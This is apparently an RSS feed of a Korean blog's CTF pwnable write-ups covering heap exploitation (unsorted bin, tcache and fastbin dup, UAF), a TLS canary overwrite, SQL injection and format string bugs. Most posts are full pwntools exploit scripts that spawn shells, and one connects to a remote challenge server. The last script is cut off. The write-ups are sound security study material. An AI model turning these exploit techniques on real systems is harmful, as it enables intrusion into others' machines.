https://baobob1024.tistory.com/ @@ ko Fri, 8 May 2026 13:27:32 +0900 TISTORY 100 ba0bab https://tistory1.daumcdn.net/tistory/2835153/attach/36e78eaf7bae448c9099f19cffe6a43e https://baobob1024.tistory.com https://baobob1024.tistory.com/193 <h3>Summary</h3> <ul> <li>Unsorted bin attack</li> <li>ROP</li> </ul> <h3>Analysis</h3> <p>login변수의 값이 있으면 rop를 할 수 있다.</p> <h3>Exploit</h3> <p>Unsorted bin attack으로 login변수에 값을 넣어줄 수 있다.</p> <h4>Unsorted bin attack condition</h4> <ul> <li>공격자에 의해 Unsorted chunk를 생성 할 수 있어야 합니다.</li> <li>공격자에 의해 Free chunk 영역에 값을 저장 할 수 있어야 합니다.</li> <li>공격자에 의해 Free chunk 와 동일한 크기의 Heap 영역을 할당 할 수 있어야 합니다.</li> </ul> <h4>exploit flow</h4> <ul> <li>2개의 Unsorted chunk 할당</li> <li>첫 번째 free</li> <li>bk 를 타겟-16(64비트 기준)으로 overwrite</li> <li>free 청크 사이즈만큼 다시 할당.</li> <li>공격 대상 영역에 main_arena.bins[0] 영역의 주소가 저장</li> </ul> <pre><code class="language-python">from pwn import * s = process(&quot;solo&quot;) e = ELF(&quot;solo&quot;) libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;) def Malloc(num, size, data): s.sendlineafter(&quot;$ &quot;, &quot;1&quot;) s.sendlineafter(&quot;: &quot;, str(num)) s.sendlineafter(&quot;: &quot;, str(size)) s.sendlineafter(&quot;: &quot;, data) def Free(num): s.sendlineafter(&quot;$ &quot;, &quot;2&quot;) s.sendlineafter(&quot;: &quot;, str(num)) def Modify(data): s.sendlineafter(&quot;$ &quot;, &quot;201527&quot;) s.sendlineafter(&quot;: &quot;, data) Malloc(1, 128, &quot;AAAAAAAA&quot;) Malloc(2, 128, &quot;BBBBBBBB&quot;) Free(1) Modify(&quot;\x00&quot;*8+p64(0x602080-0x10)) Malloc(3, 128, &quot;CCCCCCCC&quot;) prdi = 0x4008a0 prsi_r15 = 0x400d11 payload = &#39;&#39; payload += &quot;A&quot;*0x408 payload += p64(prdi) payload += p64(e.got[&#39;puts&#39;]) payload += p64(e.plt[&#39;puts&#39;]) payload += p64(0x0000000000400680) s.sendlineafter(&quot;$ &quot;, &quot;4&quot;) s.sendlineafter(&quot;: &quot;, payload) s.sendlineafter(&quot;$ &quot;, &quot;5&quot;) libc_base = u64(s.recv(6).ljust(8, &quot;\x00&quot;)) - libc.symbols[&#39;puts&#39;] magic = libc_base + 0xf1147 print(hex(libc_base)) payload = &#39;&#39; payload += &quot;\x00&quot;*0x408 payload += p64(magic) s.sendlineafter(&quot;$ &quot;, &quot;4&quot;) s.sendlineafter(&quot;: &quot;, payload) s.sendlineafter(&quot;$ &quot;, &quot;5&quot;) s.interactive()</code></pre> pwnable/CTF write-up hacking pwnable ba0bab https://baobob1024.tistory.com/193 https://baobob1024.tistory.com/193#entry193comment Thu, 30 Jan 2020 08:22:27 +0900 https://baobob1024.tistory.com/192 <h3>Summary</h3> <ul> <li>Thread Local Storage(TLS)</li> </ul> <p>리눅스는 x86: <code>gs</code>, x86_64: <code>fs</code> 레지스터로 <code>TLS</code>를 관리한다.</p> <p>&nbsp;</p> <p><code>TLS</code>란 쓰레드를 관리하기 위한 전역변수이며 해당 변수의 0번 째 인덱스에는 <code>TCB</code>(Thread Control Block)의 주소가 저장된다.</p> <p>&nbsp;</p> <p><code>TCB</code>는 해당 쓰레드를 관리하기 위한 구조체.</p> <pre class="cpp"><code>typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor used by libpthread. */ dtv_t *dtv; void *self; /* Pointer to the thread descriptor. */ int multiple_threads; int gscope_flag; uintptr_t sysinfo; uintptr_t stack_guard; uintptr_t pointer_guard; ... } tcbhead_t;</code></pre> <p>위 구조체에서 볼 수 있는 <code>stack_guard</code> 영역은 <code>fs:0x28</code> 영역에 저장되어 있는 <code>stack canary</code>이다.</p> <p>&nbsp;</p> <p>저 부분을 overwrite할 수 있다면 <code>canary</code>를 원하는 값으로 조작할 수 있다.</p> <p>&nbsp;</p> <p>새로운 쓰레드가 만들어질 때 <code>TLS</code> 영역과 새로운 쓰레드의 stack 영역이 같은 mmap 공간에 놓이게 되어 새로운 쓰레드에서 스택 오버플로우가 발생할 경우 <code>TLS</code> 영역의 <code>stack_guard</code>를 덮을 수 있다.</p> <h3>Analyze</h3> <p>3번 메뉴.</p> <pre class="cpp"><code>int Teaching() { int result; // eax pthread_t newthread; // [rsp+0h] [rbp-10h] unsigned __int64 v2; // [rsp+8h] [rbp-8h] v2 = __readfsqword(0x28u); pthread_create(&amp;newthread, 0LL, (void *(*)(void *))start_routine, 0LL); result = pthread_join(newthread, 0LL); if ( result ) { puts("oooooh :("); result = 1; } return result; }</code></pre> <p>start_routine</p> <pre class="cpp"><code>void *__fastcall start_routine(void *a1) { unsigned __int64 len; // [rsp+8h] [rbp-1018h] char s; // [rsp+10h] [rbp-1010h] unsigned __int64 v4; // [rsp+1018h] [rbp-8h] v4 = __readfsqword(0x28u); memset(&amp;s, 0, 0x1000uLL); puts("Hello!"); puts("Let me know the number!"); len = sub_400FF5(); if ( len &lt;= 0x10000 ) { read_(0, (__int64)&amp;s, len); puts("Thank You :)"); } else { puts("Too much :("); } return 0LL; }</code></pre> <p>스택상황을 보면 위에 언급한 구조체가 보임.</p> <h3>Exploit</h3> <p>rop payload 짜고 뒤에 덮어주면 됨.</p> <pre class="livecodeserver"><code>from pwn import * s = process("aeiou") e = ELF("aeiou") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") prdi = 0x4026f3 prsi_r15 = 0x4026f1 payload = '' payload += "A"*0x1008+"A"*16 payload += p64(prdi) payload += p64(0) payload += p64(prsi_r15) payload += p64(e.bss()) payload += p64(0) payload += p64(e.plt['read']) payload += p64(prdi) payload += p64(e.bss()) payload += p64(e.plt['system']) payload = payload.ljust(0x17F0, "A") s.sendlineafter("&gt;&gt;", "3") s.sendlineafter("!\n", str(len(payload))) s.send(payload) s.send("/bin/sh") s.interactive()</code></pre> pwnable/CTF write-up codegate hacking pwnable TLS ba0bab https://baobob1024.tistory.com/192 https://baobob1024.tistory.com/192#entry192comment Tue, 28 Jan 2020 14:09:02 +0900 https://baobob1024.tistory.com/191 <h3>Summary</h3> <ul> <li>1byte overflow</li> <li>UAF로 풀었는데 dup으로 풀 수 있을듯.</li> </ul> <h3>Analysis</h3> <pre class="cpp"><code> puts("[A]llocate Buffer"); puts("[F]ree Buffer"); puts("[B]anner"); puts("[E]xit"); return printf("&gt;&gt; ");</code></pre> <p>기능은 크게 2개로 나뉜다.</p> <ul> <li> <p>Allocate</p> <ul> <li> <p>chunk1(32) 할당.</p> </li> <li> <p>buffer에 입력을 받고 len(buffer)만큼 chunk2(mysize) 할당. ( len(buffer)가 16 이상일 경우, 길이가 16 미만이라면 chunk2를 할당하지 않고 chunk1에 기록.)</p> <pre class="cpp"><code> input_buf_len &lt;= 15 : struct chunk1 { char str[16]; int buf_len; int *ptr = onefree; } input_buf_len &gt; 15: struct chunk1 { int *chunk2 = malloc(buf_len); int dummy; int buf_len; int *ptr = twofree; }</code></pre> <p>그리고 ptr함수 포인터에 free하는 함수를 넣어줌. (twofree는 chunk1, 2 둘다 free)</p> </li> </ul> </li> <li> <p>Free</p> <ul> <li>ptr 함수 포인터를 호출해서 chunk free.</li> <li>함수포인터를 내가 원하는 위치로 바꾸면 call가능함.</li> </ul> </li> </ul> <h3>Exploit</h3> <p>UAF를 통해 ptr함수를 덮을 수 있음.</p> <p>&nbsp;</p> <p>pie가 걸려있기 때문에 ptr함수를 <code>1byte overflow</code>해서 <code>call puts</code> 주소로 jumping.</p> <p>-&gt; codebase leak.</p> <p>&nbsp;</p> <p>그렇게 codebase를 구했으니 printf로 다시 덮어주고 청크 앞부분에 <code>%p %p %p %p</code><br />이용하면 fsb가 가능하다.</p> <p>&nbsp;</p> <p>그렇게 rsp에 있는 libc leak해서 ptr 원샷으로 덮어주면 된다.</p> <p>&nbsp;</p> <p>fsb유발하는 트릭을 생각치 못해서 아!했다. ㅠㅠ</p> <p>&nbsp;</p> <pre class="accesslog"><code>from pwn import * s = process("./heapbabe") e = ELF("./heapbabe") def Alloc(size, contents): s.sendlineafter("&gt;&gt; ", "A") s.sendlineafter(": ", str(size)) s.sendafter(": ", contents) def Free(idx): s.sendlineafter("&gt;&gt; ", "F") s.sendlineafter(": ", str(idx)) s.sendlineafter(": ", "DELETE") Alloc(24, "A"*23) Alloc(24, "A"*23) Free(1) Free(0) Alloc(32, "C"*24 + "\xAA") Free(1) s.recvuntil("C"*24) pie_base = u64(s.recv(6)+"\x00\x00") - 0xcaa printf = pie_base + e.plt['printf'] print(hex(pie_base)) Free(1) Free(0) Alloc(32, "%11$p"+"A"*19 + p64(printf)) Free(1) libc_base = int(s.recv(14), 16) - 0x3c56a3 magic = libc_base + 0x4526a print(hex(libc_base)) Free(1) Free(0) Alloc(32, "A"*24 + p64(magic)) s.sendlineafter("&gt;&gt; ", "F") s.sendlineafter(": ", str(1)) s.sendlineafter(": ", "DELETE"+"\x00"*0x80) s.interactive()</code></pre> pwnable/CTF write-up codegate hacking pwnable ba0bab https://baobob1024.tistory.com/191 https://baobob1024.tistory.com/191#entry191comment Mon, 27 Jan 2020 16:07:08 +0900 https://baobob1024.tistory.com/190 <h3>Summary</h3> <ul> <li>tcache(18.04) challenge</li> </ul> <h3>Analysis</h3> <pre class="abnf"><code> puts("====== Ethereum wallet service ========"); puts("1. Create new wallet"); puts("2. Deposit eth"); puts("3. Withdraw eth"); puts("4. Show all wallets"); puts("5. exit");</code></pre> <p>Wallet[0] -&gt; 16byte<br />Wallet[1] -&gt; 16byte<br />Wallet[2] -&gt; 16byte<br />Wallet[3] -&gt; 16byte<br />Wallet[4] -&gt; 16byte</p> <p>&nbsp;</p> <p>지갑은 이렇게 5개까지 만들 수 있고, 구조체는</p> <pre class="cpp"><code>struct Wallet { int *fuck_rand_chunk = malloc(0x82); int *mysize_chunk = malloc(size); }</code></pre> <p>이런식이다.</p> <p>&nbsp;</p> <ul> <li>Create <ul> <li>위 구조체에서 뒤에 청크를 원하는 size만큼 할당가능하다.</li> <li>만들어진 청크에는 입력받은 size가 적힌다.</li> </ul> </li> <li>Deposit <ul> <li>지갑의 index를 입력받고 아까 만든 mysize_chunk에 입력받는 money를 += 한다.</li> </ul> </li> <li>Withdraw <ul> <li>지갑의 index를 입력받고 입력받은 money가 *mysize_chunk - money == 0이면 그 청크를 free한다.</li> <li>money에 0을 입력할 수 있어서 double free가 가능하다.</li> </ul> </li> <li>Show <ul> <li>지갑들을 다 보여주는데 small bin 만들고 free해서 main_arena 위치 보이게 하고 show하면 leak이 되겠다.</li> </ul> </li> <li>hidden <ul> <li>index에서 6을 입력하면 사용할 수 있음.</li> <li>mysize_chunk의 값을 다시 수정가능. -&gt; free된 청크의 tcache bin fd도 적을 수 있다.</li> </ul> </li> </ul> <h3>Exploit</h3> <ol> <li>leak<br />지갑들을 다 보여주는데 small bin 만들고 free해서 main_arena 위치 보이게 하고 show하면 leak이 되겠다.</li> <li>exploit<br />free시키고 fd를 <code>__free_hook</code>으로 덮어주고 할당할당해서 one_shot을 적어준다.</li> </ol> <pre class="python"><code>from pwn import * s = process("god-the-reum") e = ELF("god-the-reum") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") def Create(size): s.sendlineafter(": ", "1") s.sendlineafter(": ", str(size)) def Deposit(idx, money): s.sendlienafter(": ", "2") s.sendlineafter(": ", str(idx)) s.sendlineafter(": ", str(money)) def Withdraw(idx, money): s.sendlineafter(": ", "3") s.sendlineafter(": ", str(idx)) s.sendlineafter(": ", str(money)) def View(): s.sendlineafter(": ", "4") def Developer(idx, data): s.sendlineafter(": ", "6") s.sendlineafter(": ", str(idx)) sleep(1) s.sendlineafter(": ", data) Create(256) Create(1040) Create(1040) Withdraw(1, 1040)#free View() s.recvuntil("ballance ") s.recvuntil("ballance ") libc_base = int(s.recvline()) - libc.symbols['__malloc_hook'] - 0x10 - 96 __free_hook = libc_base + libc.symbols['__free_hook'] __malloc_hook = libc_base + libc.symbols['__malloc_hook'] system = libc_base + libc.symbols['system'] magic = libc_base + 0x4f322 print(hex(libc_base)) Withdraw(0, 256) Withdraw(0, 0) Developer(0, p64(__free_hook)) Create(256) Create(256) Developer(4, p64(magic)) Withdraw(0, 256) s.recv() s.interactive()</code></pre> pwnable/CTF write-up codegate hacking pwnable tcache ba0bab https://baobob1024.tistory.com/190 https://baobob1024.tistory.com/190#entry190comment Sun, 26 Jan 2020 08:06:59 +0900 https://baobob1024.tistory.com/189 <p>다른 문제 보다가 안풀려서 잠시 쉬어갈 겸 풀어보았다.</p> <h3>Summary</h3> <ul> <li>heap overflow</li> <li>pointer overwrite</li> </ul> <h3>Analysis</h3> <pre><code> puts(&quot;\n[V]iew my bowls&quot;); puts(&quot;[B]uy marimo&quot;); puts(&quot;[S]ell marimo&quot;); puts(&quot;[A]bout&quot;); puts(&quot;[Q]uit&quot;); printf(&quot;&gt;&gt; &quot;);</code></pre><p>메뉴는 이렇게 있고 </p> <p>입력을 받을 때 <code>show me the marimo</code>를 입력하면 마리모를 하나 준다. (size는 1) </p> <p>원래 Buy하려면 돈이 필요한데 꽁짜로 준다 ! ㅎㅎ </p> <p>마리모는 최대 15개 까지 살 수 있다.</p> <pre><code class="language-c">struct marimo{ int_32 time; int_32 size; int *name = malloc(16); int *profile = malloc(32); }</code></pre> <p>마리모 구조체는 이렇게 되고 name과 profile을 입력 받는다. </p> <ul> <li>Buy<ul> <li>위 구조체와 같으며 name과 profile을 입력 받는다.</li> <li>가격은 입력받은 수 *5이다. 근데 돈이 없어서 못 사니, 위에서 만든 마리모를 팔고 사면 된다.</li> </ul> </li> <li>Sell<ul> <li>마리모를 팔 수 있다.</li> <li>5*(size + (current_time - birth_size)) 가 가격이다. 시간에 따라 돈을 더 많이 받고 팔 수 있다.</li> </ul> </li> <li>View<ul> <li>bowl (마리모 구조체들) 값을 출력해준다.</li> <li>여기서 기존 profile값을 modify할 수 있는데, 여기서도 size를 <code>prev_size + (current_time - birth_time)</code>로 새로 값을 만들어준다. ㅋㅋ</li> <li>근데? 이 new_size*32만큼 profile을 수정할 수 있기 때문에 heap overflow가 발생한다!</li> </ul> </li> </ul> <h3>Libc leak</h3> <p>heap overflow 취약점을 통해 뒤의 마리모 구조체의 name청크 혹은 profile청크의 주소를 got로 overwrite해주고 </p> <p>view해주면 got에 담겨진 libc주소가 leak된다.</p> <h3>Exploit</h3> <p>one_shot 컨디션 잘 봐가면서 다시한번 modify해 아까 바꾼 got에 원샷 가젯을 넣어준다.</p> <pre><code class="language-python">from pwn import * import time s = process(&quot;./marimo&quot;) e = ELF(&quot;./marimo&quot;) libc = ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;) context.log_level = &#39;debug&#39; s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;show me the marimo&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;hyomin&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;profile&quot;) #show me the money s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;S&quot;) sleep(1) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;0&quot;) s.sendlineafter(&quot;?&quot;, &quot;S&quot;) # Sell marimo, get 15 dollars. s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;B&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;1&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;P&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;chunk1_name&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;chunk1_profile&quot;) # buy 1cm marimo1 s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;B&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;1&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;P&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;chunk2_name&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;chunk2_profile&quot;) # buy 1cm marimo2 sleep(2) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;V&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;0&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;M&quot;) leak_payload = &quot;A&quot;*48 + p32(int(time.time()))+p32(1)+p64(e.got[&#39;puts&#39;])*2 s.sendlineafter(&quot;&gt;&gt; &quot;, leak_payload) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;B&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;V&quot;) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;1&quot;) s.recvuntil(&quot;birth : &quot;) birth = int(s.recv(10)) s.recvuntil(&quot;name : &quot;) libc_base = u64(s.recv(6)+&quot;\x00\x00&quot;) - libc.symbols[&#39;puts&#39;] magic = libc_base + 0x45216 print(hex(libc_base)) # overflow chunk1 -&gt; chunk2 *name_chunk-&gt; puts@got #raw_input() payload = p64(magic) s.sendlineafter(&quot;&gt;&gt; &quot;, &quot;M&quot;) #raw_input() s.sendlineafter(&quot;Give me new profile\n&gt;&gt; &quot;, payload) s.interactive()</code></pre> <p>딱히 어렵지도 않고 재밌었다 ㅎ </p> <pre><code>hyomin@ubuntu:~/hacking/ctf/coge/pwn/marimo$ python exploit.py [+] Starting local process &#39;./marimo&#39;: pid 25385 [*] &#39;/mnt/hgfs/hacking/ctf/coge/pwn/marimo/marimo&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) [*] &#39;/lib/x86_64-linux-gnu/libc.so.6&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 0x7ff5b7282000 [*] Switching to interactive mode $ id uid=1000(hyomin) gid=1000(hyomin) groups=1000(hyomin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ </code></pre> pwnable/CTF write-up codegate pwable 본선가고싶다 ba0bab https://baobob1024.tistory.com/189 https://baobob1024.tistory.com/189#entry189comment Fri, 24 Jan 2020 15:41:23 +0900 https://baobob1024.tistory.com/181 <h3>Summary</h3> <ul> <li>sql injection</li> <li>64bit Format String Bug</li> </ul> <h3>Analysis</h3> <p>register에서 <code>&#39;</code>를 필터링하지 않아서 <code>sql injection</code>이 가능하다.</p> <p>(login에서는 필터링함.)</p> <p>그렇게 sql injection을 통해 point를 조건값으로 바꿔주면 fsb가 가능하다.</p> <p>64bit fsb로 익스하면 됌.</p> <h3>Exploit</h3> <p>got가 덮으면 안따이길래 <code>__free_hook</code>덮었다.</p> <pre><code class="language-python">from pwn import * #s = process(&quot;bookstore&quot;) s = remote(&quot;13.124.117.126&quot;, 31337) e = ELF(&quot;bookstore&quot;) s.sendlineafter(&quot;: \n&quot;, &quot;1&quot;) s.sendlineafter(&quot;: &quot;, &quot;asdf&#39;, &#39;asdf&#39;, 2000000000); --&quot;) s.sendlineafter(&quot;: &quot;, &quot;asdf&quot;) s.sendlineafter(&quot;: \n&quot;, &quot;2&quot;) s.sendlineafter(&quot;: &quot;, &quot;asdf&quot;) s.sendlineafter(&quot;: &quot;, &quot;asdf&quot;) s.sendlineafter(&quot;: \n&quot;, &quot;3&quot;) s.sendlineafter(&quot;&gt;&gt; \n&quot;, &quot;2&quot;) s.sendlineafter(&quot;: &quot;, &quot;%2$p&quot;) s.recvline() libc_base = int(s.recv(14), 16)-0x3ed8c0 print(hex(libc_base)) one_gadget = libc_base + 0x4f322 one_gadget_low = one_gadget &amp; 0xffff one_gadget_middle = (one_gadget &gt;&gt; 16) &amp; 0xffff one_gadget_high = (one_gadget &gt;&gt; 32) &amp;0xffff low = one_gadget_low if one_gadget_middle &gt; one_gadget_low: middle = one_gadget_middle - one_gadget_low else: middle = 0x10000 + one_gadget_middle - one_gadget_low if one_gadget_high &gt; one_gadget_middle: high = one_gadget_high - one_gadget_middle else: high = 0x10000 + one_gadget_high - one_gadget_middle payload2 = &#39;&#39; payload2 += &#39;%&#39; + str(low) +&#39;c&#39; payload2 += &#39;%&#39;+&#39;13&#39;+&#39;$hn&#39; payload2 += &#39;%&#39; + str(middle) + &#39;c&#39; payload2 += &#39;%&#39;+&#39;14&#39;+&#39;$hn&#39; payload2 += &#39;%&#39; + str(high) + &#39;c&#39; payload2 += &#39;%&#39;+&#39;15&#39;+&#39;$hn&#39; payload2 += &#39;A&#39; * (8 - len(payload2) % 8) print(len(payload2)) k=libc_base + 0x3ed8e8 payload2 += p64(k) payload2 += p64(k+2) payload2 += p64(k+4) payload2 += p64(0)*10 #raw_input() s.sendlineafter(&quot;&gt;&gt; \n&quot;, &quot;2&quot;) s.sendlineafter(&quot;: &quot;, payload2) s.recvuntil(&quot;&gt;&gt; &quot;) s.sendline(&quot;3&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;4&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;3&quot;) s.sendline(&quot;1&quot;) s.recvuntil(&quot;:&quot;) s.sendline(&quot;0&quot;) s.recvuntil(&quot;sell: &quot;) s.interactive()</code></pre> <pre><code>root@ubuntu:~/hacking/ctf/grandpix/pwn2# python exploit.py [+] Opening connection to 13.124.117.126 on port 31337: Done [*] &#39;/root/hacking/ctf/grandpix/pwn2/bookstore&#39; Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 0x7f0746979000 40 [*] Switching to interactive mode $ cd home/bookstore $ cat flag WhiteHat{d2c2652a7b0578d04bf43d7cd6eb5d9b4ed318e7} $ </code></pre> pwnable/CTF write-up FSB pwnable SQLi ba0bab https://baobob1024.tistory.com/181 https://baobob1024.tistory.com/181#entry181comment Wed, 8 Jan 2020 06:13:36 +0900 https://baobob1024.tistory.com/180 <h3>Summary</h3> <ul style="list-style-type: disc;"> <li>tcache dup</li> </ul> <h3>Analysis</h3> <ul> <li>add <ul> <li>0~6까지 총 7개 할당가능.</li> <li>1024(0x400) 사이즈까지만 할당가능. (unsorted bin 사이즈의 할당이 불가능함. 그래서 tcache poisoning으로 size를 바꾸고 free해줘서 libc leak.)</li> </ul> </li> <li>edit <ul> <li>값을 수정할 수 있음.</li> <li>따로 초기화 하지 않아 delete이후에도 edit가능.</li> </ul> </li> <li>delete <ul> <li>청크를 free해줌.</li> <li>따로 초기화 하지 않아 double free 가능.</li> </ul> </li> <li>check <ul> <li>청크 안에 값들을 보여줌.</li> </ul> </li> </ul> <h3>Libc leak</h3> <pre class="stylus"><code>add(0, 32, "") delete(0) delete(0) check(0) s.recvuntil(":") heap_base=u64(s.recv(6)+"\x00\x00")-0x260 print(hex(heap_base)) edit(0, p64(heap_base+600)) add(1, 32, "") add(2, 32, p16(0x421)) add(3, 0x400, p64(0x11)*(0x400/8)) delete(0) sleep(0.5) check(0) s.recvuntil(":") s.recvuntil(":") libc_base = u64(s.recv(6)+"\x00\x00") - 0x3ebca0 magic = libc_base + 0x4f322 free_hook = libc_base + 0x3ed8e8 print(hex(libc_base))</code></pre> <ul style="list-style-type: disc;"> <li>tcache 사이즈 할당.</li> <li>double free</li> <li>edit fd -&gt; fd - 8위치로 (size 변경하기 위해)</li> <li>2번 alloc</li> <li>0x421로 변경됌.</li> <li>delete(0) -&gt; unsorted bin에 들어감.</li> <li>main_arena + 88 leak 가능.</li> </ul> <h3>Exploit</h3> <p data-ke-size="size16">익스하다보면 결론적으로는 0~6개 모두 사용하게 돼서 malloc 실행을 못함.</p> <p data-ke-size="size16">&nbsp;</p> <p>그래서 <code>__malloc_hook</code>말고 <code>__free_hook</code>을 덮음. exit 내부 덮어도 따여짐.</p> <p data-ke-size="size16">&nbsp;</p> <p><code>tcache bin</code>은 <code>fastbin</code> 과 다르게 size검사 루틴이 빠졌기 때문에 <code>__malloc_hook-35</code>를 덮거나 하는 행위는 안해도 됨!</p> <p data-ke-size="size16">&nbsp;</p> <p>또한 <code>tcache bin</code>의 fd나 bk는 헤더를 가르키고 있지 않고 청크 데이터를 가르키고 있음.</p> <p data-ke-size="size16">&nbsp;</p> <p>그냥 바로 <code>__free_hook</code> 주소 fd에 적어주면 됨.</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">덮는 과정을 요약하면 leak하는 과정과 비슷하게</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">tcache dup 하면 됨.</p> <p data-ke-size="size16">&nbsp;</p> <p data-ke-size="size16">dfb를 통해 재할당시 두 청크의 포인터를 같게 해주고</p> <p data-ke-size="size16">&nbsp;</p> <p>fd를 <code>__free_hook</code>의 주소로 변경한 뒤</p> <p data-ke-size="size16">&nbsp;</p> <p><code>__free_hook</code>에 할당해주고 edit을 통해 <code>one_shot</code> 적어주면 끝.</p> <p data-ke-size="size16">&nbsp;</p> <pre class="erlang"><code>from pwn import * s = process("hunpwn") #context.log_level = 'debug' def add(idx, size, content): s.sendlineafter("&gt;&gt; ", "1") s.sendlineafter("\n", str(idx)) s.sendlineafter("\n", str(size)) s.sendlineafter("\n", content) def edit(idx, content): s.sendlineafter("&gt;&gt; ", "2") s.sendlineafter("\n", str(idx)) s.sendlineafter("\n", content) def delete(idx): s.sendlineafter("&gt;&gt; ", "3") s.sendlineafter("\n", str(idx)) def check(idx): s.sendlineafter("&gt;&gt; ", "4") s.sendlineafter("\n", str(idx)) add(0, 32, "") delete(0) delete(0) check(0) s.recvuntil(":") heap_base=u64(s.recv(6)+"\x00\x00")-0x260 print(hex(heap_base)) edit(0, p64(heap_base+600)) add(1, 32, "") add(2, 32, p16(0x421)) add(3, 0x400, p64(0x11)*(0x400/8)) delete(0) sleep(0.5) check(0) s.recvuntil(":") s.recvuntil(":") libc_base = u64(s.recv(6)+"\x00\x00") - 0x3ebca0 magic = libc_base + 0x4f322 free_hook = libc_base + 0x3ed8e8 print(hex(libc_base)) edit(2, p64(0x410)) add(4, 1024, "") delete(4) delete(4) edit(4, p64(free_hook)) add(5, 1024, "") add(6, 1024, "") edit(6, p64(magic)) delete(6) s.interactive()</code></pre> pwnable/HackCTF HackCTF hacking heap pwnable tcache ba0bab https://baobob1024.tistory.com/180 https://baobob1024.tistory.com/180#entry180comment Sat, 4 Jan 2020 05:40:06 +0900 https://baobob1024.tistory.com/179 <p>거의 2년전에 알았던 문젠데 이제야 풀다니..</p> <h3>Summary</h3> <ul> <li>main_arena+88(unsorted bin) leak</li> <li>fastbin duplicate</li> </ul> <h3>Analysis</h3> <p>분석을 해보면 mmap으로 매핑된 주소에서 힙 청크들을 관리한다.</p> <ul> <li>Allocate<ul> <li>size입력 받은 만큼 메모리 할당</li> </ul> </li> <li>fill<ul> <li>할당 된 버퍼에 write 할 수 있다.</li> <li>size컨트롤이 가능해 heap overflow취약점이 발생한다.</li> </ul> </li> <li>free<ul> <li>메모리 해제</li> </ul> </li> <li>dump<ul> <li>할당된 청크의 적힌 데이터를 볼 수 있다.</li> </ul> </li> </ul> <h3>Iibc leak</h3> <ul> <li>fastchunk 4개 할당(0x20)(idx 0~3)</li> <li>smallchunk 1개 할당(0x80)(idx 4)</li> <li>free(1)</li> <li>free(2)</li> <li>fill(0)에서 fastchunk(2)의 fd를 smallchunk의 위치로 1byte overflow</li> <li>fill(3)에서 overflow해 smallchunk의 size를 0x91에서 0x31로 overwrite</li> <li>alloc 2번 하면 idx 2가 smallchunk의 위치에 할당됨. (idx 2, idx 4가 같은 위치)</li> <li>fill(3)에서 overflow해 smallchunk의 size를 0x31에서 0x91로 overwrite</li> <li>chunk 하나를 더 allocate해서 idx 4를 프리해도 fd bk가 남아있을 수 있도록.(그냥 두면 스몰빈과 라지빈은 통합됨.)</li> <li>free(4) 이제 4의 위치에는 main_arena+88을 가르키는 fd와 bk가 있음.</li> <li>하지만 idx 2도 그 위치를 가르키고 있기때문에 dump(2)하면 libc leak 가능.</li> </ul> <h3>Exploit</h3> <p>마찬가지로 bin을 잘 조작해서 <code>&amp;__malloc_hook-35</code> 위치에 0x68할당해주고 overwrite해주면 된다.</p> <p>시나리오는 다양해서 bin만 잘 조작하면 된다.</p> <p><code>&amp;__malloc_hook-35</code>에 덮는 이유는 fastbin 할당할 때 size검사를 하게 되는데 -35위치에 할당하면 size가 0x7f로 세팅되어있다.</p> <p>그래서 0x60이나 0x68 등으로 할당해주면 된다.</p> <p>( tcachebin은 size체크 루틴이 빠졌기 때문에 &amp;__malloc_hook위치에 바로 할당해주면 될듯.)</p> <p>익스코드는 더럽지만 의식의 흐름대로 익스했다..</p> <pre><code class="language-python">from pwn import * p = process(&quot;./babyheap&quot;) #context.log_level=&#39;debug&#39; malloc_hook = 0x3c4b10 def alloc(size): p.recvuntil(&quot;Command: &quot;) p.sendline(&quot;1&quot;) p.recvuntil(&quot;Size: &quot;) p.sendline(str(size)) def fill(index,size,data): p.recvuntil(&quot;Command: &quot;) p.sendline(&quot;2&quot;) p.recvuntil(&quot;Index: &quot;) p.sendline(str(index)) p.recvuntil(&quot;Size: &quot;) p.sendline(str(size)) p.recvuntil(&quot;Content: &quot;) p.sendline(str(data)) def free(index): p.recvuntil(&quot;Command: &quot;) p.sendline(&quot;3&quot;) p.recvuntil(&quot;Index: &quot;) p.sendline(str(index)) def dump(index): p.recvuntil(&quot;Command: &quot;) p.sendline(&quot;4&quot;) p.recvuntil(&quot;Index: &quot;) 